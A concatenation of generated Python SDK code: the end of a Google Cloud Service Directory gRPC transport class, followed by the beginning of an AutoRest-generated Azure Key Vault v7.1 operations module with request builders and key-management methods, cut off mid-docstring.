self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@classmethod
def create_channel(
cls,
host: str = "servicedirectory.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
Raises:
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def resolve_service(
self,
) -> Callable[
[lookup_service.ResolveServiceRequest], lookup_service.ResolveServiceResponse
]:
r"""Return a callable for the resolve service method over gRPC.
Returns a
[service][google.cloud.servicedirectory.v1beta1.Service] and its
associated endpoints. Resolving a service is not considered an
active developer method.
Returns:
Callable[[~.ResolveServiceRequest],
~.ResolveServiceResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "resolve_service" not in self._stubs:
self._stubs["resolve_service"] = self.grpc_channel.unary_unary(
"/google.cloud.servicedirectory.v1beta1.LookupService/ResolveService",
request_serializer=lookup_service.ResolveServiceRequest.serialize,
response_deserializer=lookup_service.ResolveServiceResponse.deserialize,
)
return self._stubs["resolve_service"]
def close(self):
self.grpc_channel.close()
__all__ = ("LookupServiceGrpcTransport",)
|
py | 1a4fafeb6fee22a46eb546f7e1706a35bfc6ac47 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
# fmt: off
def build_create_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/create')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_import_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_delete_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_update_key_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PATCH",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_key_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_key_versions_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
maxresults = kwargs.pop('maxresults', None) # type: Optional[int]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/versions')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_keys_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
maxresults = kwargs.pop('maxresults', None) # type: Optional[int]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys')
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_backup_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/backup')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_restore_key_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/restore')
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_encrypt_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/encrypt')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_decrypt_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/decrypt')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_sign_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/sign')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_verify_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/verify')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_wrap_key_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/wrapkey')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_unwrap_key_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/unwrapkey')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_deleted_keys_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
maxresults = kwargs.pop('maxresults', None) # type: Optional[int]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/deletedkeys')
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_deleted_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/deletedkeys/{key-name}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_purge_deleted_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/deletedkeys/{key-name}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_recover_deleted_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/deletedkeys/{key-name}/recover')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
# fmt: on
class KeyVaultClientOperationsMixin(object):
@distributed_trace
def create_key(
self,
vault_base_url, # type: str
key_name, # type: str
parameters, # type: "_models.KeyCreateParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""Creates a new key, stores it, then returns key parameters and attributes to the client.
The create key operation can be used to create any key type in Azure Key Vault. If the named
key already exists, Azure Key Vault creates a new version of the key. It requires the
keys/create permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name for the new key. The system will generate the version name for the
new key.
:type key_name: str
:param parameters: The parameters to create a key.
:type parameters: ~azure.keyvault.v7_1.models.KeyCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyCreateParameters')
request = build_create_key_request(
key_name=key_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.create_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_key.metadata = {'url': '/keys/{key-name}/create'} # type: ignore
@distributed_trace
def import_key(
self,
vault_base_url, # type: str
key_name, # type: str
parameters, # type: "_models.KeyImportParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""Imports an externally created key, stores it, and returns key parameters and attributes to the
client.
The import key operation may be used to import any key type into an Azure Key Vault. If the
named key already exists, Azure Key Vault creates a new version of the key. This operation
requires the keys/import permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: Name for the imported key.
:type key_name: str
:param parameters: The parameters to import a key.
:type parameters: ~azure.keyvault.v7_1.models.KeyImportParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyImportParameters')
request = build_import_key_request(
key_name=key_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.import_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
import_key.metadata = {'url': '/keys/{key-name}'} # type: ignore
@distributed_trace
def delete_key(
self,
vault_base_url, # type: str
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.DeletedKeyBundle"
"""Deletes a key of any type from storage in Azure Key Vault.
The delete key operation cannot be used to remove individual versions of a key. This operation
removes the cryptographic material associated with the key, which means the key is not usable
for Sign/Verify, Wrap/Unwrap or Encrypt/Decrypt operations. This operation requires the
keys/delete permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key to delete.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedKeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.DeletedKeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_delete_key_request(
key_name=key_name,
api_version=api_version,
template_url=self.delete_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedKeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_key.metadata = {'url': '/keys/{key-name}'} # type: ignore
@distributed_trace
def update_key(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyUpdateParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""The update key operation changes specified attributes of a stored key and can be applied to any
key type and key version stored in Azure Key Vault.
In order to perform this operation, the key must already exist in the Key Vault. Note: The
cryptographic material of a key itself cannot be changed. This operation requires the
keys/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of key to update.
:type key_name: str
:param key_version: The version of the key to update.
:type key_version: str
:param parameters: The parameters of the key to update.
:type parameters: ~azure.keyvault.v7_1.models.KeyUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyUpdateParameters')
request = build_update_key_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.update_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_key.metadata = {'url': '/keys/{key-name}/{key-version}'} # type: ignore
@distributed_trace
def get_key(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""Gets the public part of a stored key.
The get key operation is applicable to all key types. If the requested key is symmetric, then
no key material is released in the response. This operation requires the keys/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
